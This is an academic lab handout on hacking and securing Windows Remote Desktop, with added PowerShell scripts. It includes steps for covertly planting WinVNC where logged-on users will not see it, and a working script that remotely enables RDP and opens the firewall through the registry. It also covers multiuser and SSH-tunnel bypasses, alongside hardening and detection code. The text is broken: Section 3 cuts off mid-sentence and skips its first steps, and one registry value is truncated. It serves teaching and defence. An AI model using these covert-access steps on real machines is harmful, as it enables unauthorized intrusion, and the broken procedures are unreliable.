Lab Exercise: Hacking into Remote Desktop and Security Measures, Lab Reports of Electrical and Electronics Engineering

Instructions for a lab exercise on hacking into Remote Desktop and implementing security measures. The lab covers techniques for abusing weak Remote Desktop Protocol (RDP) configurations, such as re-enabling a disabled Remote Desktop through the remote registry, the multiuser Remote Desktop hack, and carrying RDP through a firewall inside an SSH tunnel. It then covers countermeasures: limiting which users may log on remotely, account lockout, the connection encryption level, and changing the RDP port. Students use Microsoft Remote Desktop and VNC software for this lab.

Typology: Lab Reports


Uploaded on 09/17/2009

ECE 4112 Internetwork Security
Lab X : Remote Desktop Hacking and Security
Group Number:_____________
Member Names: ______________________ _______________________
Date Assigned: December 06, 2007
Date Due: December 13, 2007
Last Edited: December 03, 2007
Lab Authored by: Raghav Chawla and Jon Ussery

Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions and be sure you turn in ALL materials listed in the Turn-in Checklist ON or BEFORE the Date Due.

Goal: This lab will introduce you to the Remote Desktop functionality in Windows. RDP hands whoever can authenticate a full interactive session, so a weak configuration (an exposed port, weak passwords with no lockout, a low encryption level, or a "disabled" service that can be switched back on through the registry) makes it an easy way to compromise a PC. The lab also covers the precautions and security measures that can be taken against these attacks.

Background and Theory: Remote Desktop is remote administration software: the session runs on the remote host and only its display is rendered locally. Microsoft's Terminal Services lets users reach data and applications on a remote computer. This differs from application streaming, because the computation happens on the remote PC.

Terminal Services was introduced with Windows NT 4.0 (Terminal Server Edition) and substantially improved in Windows 2000. Vista adds features such as clipboard and audio redirection. The difference between the client and server editions of Windows is that client editions allow only one interactive user at a time, whereas server editions allow concurrent sessions.

The Remote Desktop Protocol (RDP) listens on TCP port 3389. Keyboard and mouse input and screen updates travel over that TCP connection. Virtual channels carry device redirection (printers, audio, clipboard, etc.). Microsoft also ships the client as an ActiveX control (Remote Desktop Web Connection) so that it can be embedded in a web page.

There are various software packages which provide remote desktop functionality, among them 'Microsoft Remote Desktop Connection', 'TightVNC', 'Apple Remote Desktop', and 'GoToMyPC'. Each uses different security measures. We will see how to exploit certain weaknesses in the way Remote Desktop is configured and protected, and we will also learn how to secure our PCs against such attacks.

Prelab Questions: None

Lab Equipment: This lab uses two Windows machines. Pick one as the target (victim) and the other as the local (attacking) machine. Windows Remote Desktop and WinVNC are the two software packages that will be used.

Section 1: Hacking into Remote Desktop

Requires: Regini.exe (http://www.dynawell.com/reskit/microsoft/win2000/regini.zip) and VNC software (from realvnc.com). This section assumes you can already transfer files to the remote PC, i.e. you hold credentials that give you write access to it.

  1. From the local Windows machine, check whether port 3389 is listening on the remote victim machine (the second Windows machine).
  2. If Terminal Services is not available, install Virtual Network Computing on the victim instead. Copy the VNC executable and the files it needs (WINVNC.EXE, VNCHooks.DLL and OMNITHREAD_RT.DLL) to the target server.

Question 1.1 : Why would it be a "good idea" for a hacker to put the files in a systemroot folder?

One consideration is that newer versions of WinVNC add a small green icon to the system tray whenever the server is started. Versions 3.3.2 and earlier, when started from the command line, are more or less invisible to users interactively logged on.

  3. Once WinVNC is copied over, the VNC password needs to be set, and WinVNC needs to be told to listen for incoming connections. Both settings are normally made through the GUI, but they are stored in the registry, so we write them directly: create a file called WINVNC.INI containing the registry changes we want, and load it on the target with Regini.exe. The Password value is the 8-byte obfuscated VNC password in the form WinVNC itself stores it (for REG_BINARY, Regini takes the byte count first, then the data):

    HKEY_USERS\.DEFAULT\Software\ORL\WinVNC
        SocketConnect = REG_DWORD 0x
        Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e

Section 2: Connecting to Remote Desktop Even When This Functionality Is Disabled

Connecting to another machine's registry requires the Remote Registry service to be running on the target and an account that is an administrator there. With that, Remote Desktop can be switched back on without ever touching the target's console:

  1. Open Regedit on the local (attacking) machine.
  2. Select File - Connect Network Registry.
  3. Enter the name of the target machine and select "Check Names".
  4. At the bottom of your registry tree you will now see two hives appear under the target's computer name: HKEY_LOCAL_MACHINE and HKEY_USERS.
  5. Go to HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server and find the value fDenyTSConnections (REG_DWORD). A value of 1 means Remote Desktop connections are refused; the "Allow users to connect remotely to this computer" checkbox on the Remote tab sets it to 0.
  6. Change fDenyTSConnections to 0.
  7. Attempt to log on again with the Remote Desktop client.

Additional steps for Windows XP SP2: the Windows Firewall blocks access to port 3389. Make sure to create or change the following registry value, which is the firewall's own "Remote Desktop" exception:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
        Value name: 3389:TCP
        Value data (REG_SZ): 3389:TCP:*:Enabled:@xpsp2res.dll,-22009

Repeat the change under:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List

Question 2.1: How could you prevent something like this from happening? [Reference 2]
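The port check from Section 1 and the remote-registry procedure from Section 2, written as a PowerShell script. This is an added example, not code from the original lab. It assumes the attacking machine holds administrative credentials on the target, that the target's Remote Registry service is running, and that the target runs the Windows XP SP2 firewall (the GloballyOpenPorts list is that firewall's format; Vista and later keep rules elsewhere and ignore it). The host name 'VICTIM-XP' is a placeholder.

```powershell
# Added example: Section 1 port check + Section 2 remote-registry RDP enable.
# Assumes admin credentials on $Target and a running Remote Registry service there.

function Test-TcpPort {
    # True if $ComputerName accepts a TCP connection on $Port within $TimeoutMs.
    param([string]$ComputerName, [int]$Port = 3389, [int]$TimeoutMs = 2000)
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $pending = $client.BeginConnect($ComputerName, $Port, $null, $null)
        if (-not $pending.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) { return $false }
        $client.EndConnect($pending)
        return $true
    } catch {
        return $false
    } finally {
        $client.Close()
    }
}

function Enable-RemoteDesktopViaRegistry {
    # Opens HKLM on $Target over the Remote Registry service, clears
    # fDenyTSConnections and writes the XP SP2 firewall exception for 3389/TCP
    # into both the Domain and Standard profiles (the values from Section 2).
    param([Parameter(Mandatory)][string]$Target)
    $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(
        [Microsoft.Win32.RegistryHive]::LocalMachine, $Target)
    try {
        $ts = $hklm.OpenSubKey('SYSTEM\CurrentControlSet\Control\Terminal Server', $true)
        $ts.SetValue('fDenyTSConnections', 0, [Microsoft.Win32.RegistryValueKind]::DWord)
        $ts.Close()
        foreach ($fwProfile in 'DomainProfile', 'StandardProfile') {
            $path = 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\' +
                    "FirewallPolicy\$fwProfile\GloballyOpenPorts\List"
            $list = $hklm.CreateSubKey($path)
            $list.SetValue('3389:TCP', '3389:TCP:*:Enabled:@xpsp2res.dll,-22009',
                [Microsoft.Win32.RegistryValueKind]::String)
            $list.Close()
        }
    } finally {
        $hklm.Close()
    }
}

function Get-RemoteDesktopExposure {
    # The defender's view of the same settings: reads them, changes nothing.
    param([string]$Target = $env:COMPUTERNAME)
    $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(
        [Microsoft.Win32.RegistryHive]::LocalMachine, $Target)
    try {
        $ts   = $hklm.OpenSubKey('SYSTEM\CurrentControlSet\Control\Terminal Server')
        $deny = $ts.GetValue('fDenyTSConnections')
        $open = foreach ($fwProfile in 'DomainProfile', 'StandardProfile') {
            $list = $hklm.OpenSubKey('SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\' +
                                     "FirewallPolicy\$fwProfile\GloballyOpenPorts\List")
            if ($list -and $list.GetValue('3389:TCP')) { $fwProfile }
        }
        [pscustomobject]@{
            Target               = $Target
            RdpEnabled           = ($deny -eq 0)
            Port3389Listening    = Test-TcpPort -ComputerName $Target
            FirewallProfilesOpen = @($open)
        }
    } finally {
        $hklm.Close()
    }
}

# Usage, with a placeholder target name:
# Get-RemoteDesktopExposure -Target 'VICTIM-XP'        # before: RdpEnabled False
# Enable-RemoteDesktopViaRegistry -Target 'VICTIM-XP'
# Get-RemoteDesktopExposure -Target 'VICTIM-XP'        # after:  RdpEnabled True
```

The attack and the audit read the same three registry values, which is the point: whoever can write to a machine's registry over the network can turn its Remote Desktop on, and anyone checking whether that has happened only needs to read them.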

Section 3: Multiuser Remote Desktop Hack

Windows XP has several limitations. One of them is that it can be controlled by only one user at a time: either one physically present user or one remote user may be logged on. So if someone logs in from remote, the local user is disconnected (and notices). The following procedure removes this limit and allows several people to use a single computer remotely at the same time, so that a remote session no longer kicks the console user off. This is a great way for a malicious user to repeatedly

click with the right mouse button on blank space in the right part of the registry window, choose "New" > DWORD, name the new value "EnableConcurrentSessions" (without quotes), then edit it and set its value to 1; close the editor.

STEP 5 Click Start, then "Run...", type "gpedit.msc" (without quotes) and press ENTER; open Computer Configuration > Administrative Templates > Windows Components > Terminal Services; double-click "Limit number of connections", choose "Enabled" and set the maximum number of concurrent connections you want to allow (2 or more), then restart Windows in normal mode.

STEP 6 Go back to the Remote tab of My Computer's properties (see step 1) and activate "Allow users to connect remotely to this computer"; go back to "Terminal Services" in "Services" (see step 2) and set its "Startup type" to "Manual". Now restart Windows. Your operating system should now accept multiple Remote Desktop connections. User accounts are configured in the Control Panel, and the list of users allowed to connect to the PC is editable in the Remote tab of My Computer.

Question 3.1: Is there a way of knowing whether someone is logged on to your computer using Remote Desktop even after these changes have been made to your machine? [Reference 3]
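What a user sitting at a machine can do to see the sessions the multiuser hack hides from the screen, as an added example that is not part of the original lab. It parses the fixed-width output of qwinsta.exe (query session), locating columns by the header so that a disconnected session with a blank SESSIONNAME is not mistaken for a user name, and then pulls type-10 (RemoteInteractive) logons out of the Security log. $SampleQwinsta is constructed output for offline use, not captured from a real host; the Security-log function needs an elevated prompt and Vista or later (on XP the equivalent event is 528 with logon type 10).

```powershell
# Added example: list Remote Desktop sessions and RDP logon events.
# Sample qwinsta output below is constructed, not captured.

function ConvertFrom-Qwinsta {
    # Turns qwinsta/query session text into objects, using the header's column offsets.
    param([Parameter(Mandatory)][string[]]$Lines)
    $header = $Lines | Where-Object { $_ -match 'SESSIONNAME' } | Select-Object -First 1
    if (-not $header) { return }
    $userCol  = $header.IndexOf('USERNAME')
    $stateCol = $header.IndexOf('STATE')
    $typeCol  = $header.IndexOf('TYPE')
    $pattern  = '^\s*(?<user>\S*)\s*(?<id>\d+)\s*$'   # USERNAME left-aligned, ID right-aligned
    foreach ($line in $Lines) {
        if ($line -eq $header -or -not $line.Trim()) { continue }
        $row = $line.PadRight($header.Length)
        $mid = $row.Substring($userCol, $stateCol - $userCol)
        if ($mid -match $pattern) {
            [pscustomobject]@{
                SessionName = $row.Substring(1, $userCol - 1).Trim()   # column 0 holds the '>' marker
                UserName    = $Matches['user']
                Id          = [int]$Matches['id']
                State       = $row.Substring($stateCol, $typeCol - $stateCol).Trim()
                Type        = $row.Substring($typeCol).Trim()
                Current     = $line.StartsWith('>')
            }
        }
    }
}

function Get-RdpSessions {
    # Sessions that arrived over RDP (rdp-tcp#N) or are disconnected but still
    # owned by a user: exactly the ones the console user does not see on screen.
    param([string[]]$Lines = (& qwinsta.exe 2>$null))
    ConvertFrom-Qwinsta -Lines $Lines |
        Where-Object { $_.UserName -and ($_.SessionName -like 'rdp-tcp#*' -or $_.State -eq 'Disc') }
}

function Get-RdpLogonEvents {
    # Successful logons with logon type 10 (RemoteInteractive) from the Security log.
    # In event 4624, Properties[5] is the account, [8] the logon type, [18] the source address.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[8].Value -eq 10 } |
        ForEach-Object {
            [pscustomobject]@{ Time = $_.TimeCreated; User = $_.Properties[5].Value; Source = $_.Properties[18].Value }
        }
}

# Constructed sample in qwinsta's layout: a console user, one RDP user, one
# disconnected session with a blank SESSIONNAME, and the listener itself.
$fmt = '{0}{1,-18}{2,-25}{3,5}  {4,-8}{5}'
$SampleQwinsta = @(
    ($fmt -f ' ', 'SESSIONNAME', 'USERNAME', 'ID', 'STATE',  'TYPE        DEVICE'),
    ($fmt -f ' ', 'services',    '',         0,    'Disc',   ''),
    ($fmt -f '>', 'console',     'alice',    1,    'Active', ''),
    ($fmt -f ' ', 'rdp-tcp#2',   'bob',      2,    'Active', 'rdpwd'),
    ($fmt -f ' ', '',            'carol',    3,    'Disc',   ''),
    ($fmt -f ' ', 'rdp-tcp',     '',         65536,'Listen', '')
)
Get-RdpSessions -Lines $SampleQwinsta | Format-Table -AutoSize
# Reports bob (rdp-tcp#2, Active) and carol (Disc); alice and the listener are filtered out.
```

Run Get-RdpSessions with no arguments on a live machine to read the real qwinsta output; qwinsta ships with XP Professional and later, but not with Home editions.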

Section 4: Hacking Remote Desktop Through a Firewall

Using PuTTY (an SSH client for Windows), you can easily set up a tunnel for reaching Remote Desktop on a server behind a firewall, provided you have SSH access to some machine that can itself reach that server:

  1. Configure a new SSH session for the SSH server that you have access to (128.62.109.197 in this example).
  2. In the Connection > SSH > Tunnels menu, add a new forwarded port. You need to pick a source port on your own machine (this becomes the local, forwarded end of the connection to the remote Remote Desktop server), so use something unused, like 5800.
  3. In the Destination field, enter the IP address and RDP port of the firewalled machine as the SSH server sees it, i.e. <ip_address>:3389 (3389 is what Remote Desktop listens on).

Now save your session and connect to the SSH server. At this point you can reach the remote server's RDP port via your local machine's port 5800. Everything that goes in and out of localhost:5800 is carried inside the SSH connection to the intermediary machine, which connects onward to your destination server's port 3389. So instead of entering <ip_address>:3389 for your destination server in the Remote Desktop client, enter localhost:5800. The firewall between you and the target only ever sees an SSH session to the intermediary; the RDP traffic inside it is encrypted and invisible to port-based filtering, which is why the connection goes right through. Take a screenshot showing that you successfully configured SSH tunneling. [Screenshot 2]

Breaking Firewalls with OpenSSH and PuTTY - http://souptonuts.sourceforge.net/sshtips.htm

Question 4.1: How can you prevent this? [Reference 4]
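The same tunnel built from the command line, as an added example that is not part of the original lab, using the OpenSSH client that ships with current Windows (ssh.exe) rather than the PuTTY GUI; plink.exe, PuTTY's command-line client, accepts the same -N and -L arguments. Host names, the user name and the ports are placeholders. It assumes key-based authentication to the jump host so that ssh does not stop to prompt for a password.

```powershell
# Added example: local port forward for RDP over SSH, then mstsc on the local end.
# -N: no remote shell, just forwarding.  -L 5800:target:3389: ssh listens on
# 127.0.0.1:5800 and the jump host opens target:3389 for each accepted connection.

function Start-RdpOverSsh {
    param(
        [Parameter(Mandatory)][string]$JumpHost,    # SSH server you can reach, e.g. 128.62.109.197
        [Parameter(Mandatory)][string]$JumpUser,
        [Parameter(Mandatory)][string]$RdpTarget,   # firewalled machine, as seen from the jump host
        [int]$LocalPort = 5800,
        [int]$RdpPort   = 3389
    )
    $forward = '{0}:{1}:{2}' -f $LocalPort, $RdpTarget, $RdpPort
    $ssh = Start-Process -FilePath 'ssh.exe' -PassThru -NoNewWindow `
        -ArgumentList @('-N', '-L', $forward, "$JumpUser@$JumpHost")

    # Wait until the local listener is up, or give up if ssh exits (e.g. auth failure).
    $deadline = (Get-Date).AddSeconds(30)
    while ((Get-Date) -lt $deadline) {
        if ($ssh.HasExited) { throw "ssh exited with code $($ssh.ExitCode)" }
        $listening = (netstat.exe -an) -match "^\s*TCP\s+\S+:$LocalPort\s+\S+\s+LISTENING"
        if ($listening) { return $ssh }
        Start-Sleep -Milliseconds 500
    }
    Stop-Process -Id $ssh.Id -Force
    throw "local port $LocalPort never came up"
}

# Usage with placeholder values (if the SSH server is the RDP target itself, use -RdpTarget 'localhost'):
# $tunnel = Start-RdpOverSsh -JumpHost '128.62.109.197' -JumpUser 'student' -RdpTarget '10.0.0.5'
# mstsc.exe /v:localhost:5800      # the RDP client talks to the tunnel, not to the firewall
# Stop-Process -Id $tunnel.Id      # tear the tunnel down when done
```

From the firewall's side there is one outbound TCP connection to the jump host's SSH port and nothing on 3389, which is what Question 4.1 asks you to think about.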

Section 5: Remote Desktop Security Measures

1. Limit which users can log on remotely

On the Remote tab of My Computer's properties, "Select Remote Users..." lists the accounts allowed to connect; here, add only the users who you want to be able to log in remotely. Unfortunately, that setting by itself does less than it appears to: you will find that you can still log on as any administrator account, because members of Administrators hold the logon right through policy and the dialog does not show it. The real list lives elsewhere. Click Start - Programs - Administrative Tools - Local Security Policy. If you can't find it, you can also do Start - Run - enter "%SystemRoot%\system32\secpol.msc /s" - OK.

Under Local Policies - User Rights Assignment there is an entry "Allow logon through Terminal Services", and next to it "Administrators, Remote Desktop Users". Too bad the other screen didn't show "Administrators". Double-click this setting and remove "Administrators". If you want a particular administrator to have access, add that account explicitly through the other screen, which puts it in the Remote Desktop Users group.

2. Set an account lockout policy

There are tools that brute-force passwords against the Remote Desktop logon. You cannot stop people from trying, but you can make it pointless with an account lockout policy: after a few wrong guesses the account is locked for a period of time, which turns hours or days of guessing into centuries and makes brute force infeasible. From the same Local Security Policy screen as before, go to Account Policies - Account Lockout Policy and set the lockout threshold, the lockout duration, and the window after which the bad-guess counter resets. A lockout policy also lets an attacker who knows a user name lock that user out on purpose, so choose a duration you can live with rather than "forever".

3. Require passwords and 128-bit encryption

For compatibility with older, weaker clients, Windows XP defaults to "Client Compatible" encryption, which negotiates down to whatever the client supports (56-bit or 40-bit for old clients). If you are connecting with older software, upgrade it. (If you connect with the PocketPC Terminal Services Client, this setting will lock you out, since that client does not support high encryption.) Click Start - Run - "%SystemRoot%\system32\gpedit.msc /s" to get to the Group Policy Editor. From there, go to Computer Configuration - Administrative Templates - Windows Components - Terminal Services - Encryption and Security.

Change "Set client connection encryption level" from "Not Configured" to "Enabled" with "High Level" to force 128-bit encryption in both directions. This protects your password and everything transmitted during the session from a passive eavesdropper; it does not authenticate the server to the client, which is what Question 5.2 is about. Enabling "Always prompt client for password upon connection" prevents a remote user from saving the password on the client computer and skipping the password prompt. Saving passwords is generally dangerous: the password now sits on another computer, and the user tends to forget it.

4. Change the RDP port number

Opening TCP port 3389 from the Internet to your computer is a bad idea: scanners and brute-force tools look for Remote Desktop on its default port and are much less likely to try other ports. So a worthwhile measure is to move the port RDP listens on and then allow only that port through the firewall. The port is the PortNumber (REG_DWORD) value under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp; Terminal Services must be restarted (or the machine rebooted) for the change to take effect, and clients then connect to host:port. This is obscurity rather than protection: it cuts the noise from automated scanning but does nothing against someone who port-scans you, so it complements, and does not replace, the lockout policy and encryption settings above.

Whatever port you use, watch the logs. The Event Viewer's Security log records failed logon attempts and account lockouts; check it periodically to see if anyone is trying to get in. If your firewall keeps logs (Windows Firewall can), use them to see when someone tries to connect.
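The four measures above applied from an elevated PowerShell prompt, followed by the log check, as an added example that is not part of the original lab. The registry paths, the secedit privilege name and the SIDs of the built-in groups are the real ones; the port 33890 and the lockout figures are placeholders to adjust. It assumes Vista or later for the netsh advfirewall and Get-WinEvent calls (XP has neither), and it changes who can log on and which port RDP uses, so try it on a test VM first.

```powershell
# Added example: Section 5 hardening (items 1-4) plus the failed-logon audit.
# Run elevated. Port and lockout numbers are placeholders.

$TsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
$RdpTcp   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'

function Set-RemoteLogonRight {
    # 1. "Allow logon through Terminal Services" is SeRemoteInteractiveLogonRight.
    # Leave only Remote Desktop Users (S-1-5-32-555); Administrators (S-1-5-32-544)
    # then need explicit membership of that group to get in.
    param([string[]]$Sids = @('S-1-5-32-555'))
    $cfg = Join-Path $env:TEMP 'rights.inf'
    $db  = Join-Path $env:TEMP 'rights.sdb'
    secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $value = ($Sids | ForEach-Object { "*$_" }) -join ','
    $lines = Get-Content $cfg
    if ($lines -match '^SeRemoteInteractiveLogonRight') {
        $lines = $lines -replace '^SeRemoteInteractiveLogonRight\s*=.*$', "SeRemoteInteractiveLogonRight = $value"
    } else {
        $lines = $lines -replace '^\[Privilege Rights\]$', "[Privilege Rights]`r`nSeRemoteInteractiveLogonRight = $value"
    }
    Set-Content -Path $cfg -Value $lines -Encoding Unicode
    secedit.exe /configure /db $db /cfg $cfg /areas USER_RIGHTS | Out-Null
}

function Set-AccountLockoutPolicy {
    # 2. Five bad guesses lock the account for 30 minutes; the counter resets after 30.
    # The window must not exceed the duration.
    param([int]$Threshold = 5, [int]$DurationMinutes = 30, [int]$WindowMinutes = 30)
    net.exe accounts "/lockoutthreshold:$Threshold" "/lockoutduration:$DurationMinutes" "/lockoutwindow:$WindowMinutes" | Out-Null
}

function Set-RdpEncryptionAndPrompt {
    # 3. MinEncryptionLevel 3 = "High" (128-bit both ways); 2 is the default
    # "Client Compatible". fPromptForPassword 1 = always ask, so a password saved
    # in an .rdp file cannot be replayed silently. Policy values override RDP-Tcp.
    New-Item -Path $TsPolicy -Force | Out-Null
    Set-ItemProperty -Path $TsPolicy -Name MinEncryptionLevel -Value 3 -Type DWord
    Set-ItemProperty -Path $TsPolicy -Name fPromptForPassword -Value 1 -Type DWord
}

function Set-RdpPort {
    # 4. Move the listener, open the new port inbound, restart Terminal Services.
    param([int]$Port = 33890)
    Set-ItemProperty -Path $RdpTcp -Name PortNumber -Value $Port -Type DWord
    netsh.exe advfirewall firewall add rule "name=Remote Desktop custom port $Port" dir=in action=allow protocol=TCP "localport=$Port" | Out-Null
    Restart-Service -Name TermService -Force
}

function Get-RdpFailedLogons {
    # The Event Viewer check as a query: 4625 failures grouped by source address.
    # In 4625, Properties[10] is the logon type and [19] the source address.
    # Type 10 is RemoteInteractive; with Network Level Authentication the failure is
    # recorded as type 3 before a session exists, so both are counted.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[10].Value -in 3, 10 } |
        Group-Object { $_.Properties[19].Value } |
        Sort-Object Count -Descending |
        Select-Object @{ n = 'SourceAddress'; e = { $_.Name } }, Count
}

# Usage (elevated):
# Set-RemoteLogonRight; Set-AccountLockoutPolicy; Set-RdpEncryptionAndPrompt; Set-RdpPort -Port 33890
# Get-RdpFailedLogons -Hours 24      # then connect with: mstsc /v:host:33890
```

Account lockouts themselves are event 4740; a burst of 4625s from one address followed by a 4740 is the lockout policy doing its job, and the address is what you feed to the firewall.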

Answer Sheet Lab X

Group Number: _______________ Member Names: _________________________ _________________________

Section 1: Hacking into Remote Desktop

Question 1.1 : Why would it be a “good idea” for a hacker to put the files in a systemroot folder?

Section 2: Connecting to Remote Desktop Even When This Functionality Is Disabled

Question 2.1: How could you prevent something like this from happening?

Section 3: Multiuser Remote Desktop Hack

Question 3.1: Is there a way of knowing whether someone is logged on to your computer using Remote Desktop even after these changes have been made to your machine?

Section 4: Hacking Remote Desktop Through a Firewall

Question 4.1: How can you prevent this?

Section 5: Remote Desktop Security Measures

Question 5.1: What value did you choose for the lockout duration? Why?

Question 5.2: How can you get rid of the vulnerability of Remote Desktop to man-in-the-middle attacks?

How long did it take you to complete this lab? Was it an appropriate length lab?